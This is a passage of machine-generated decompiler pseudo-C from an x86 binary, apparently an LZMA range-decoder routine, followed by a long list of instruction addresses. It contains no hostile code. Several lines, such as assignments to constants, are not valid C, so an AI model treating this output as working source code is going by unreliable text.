								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066ce
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00000000
                                                                      0x00406b28
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x00000000
                                                                      0x00406997
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x00406618
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00000000
                                                                      0x00406b4f
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00000000
                                                                      0x00406345
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00000000
                                                                      0x00406690
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
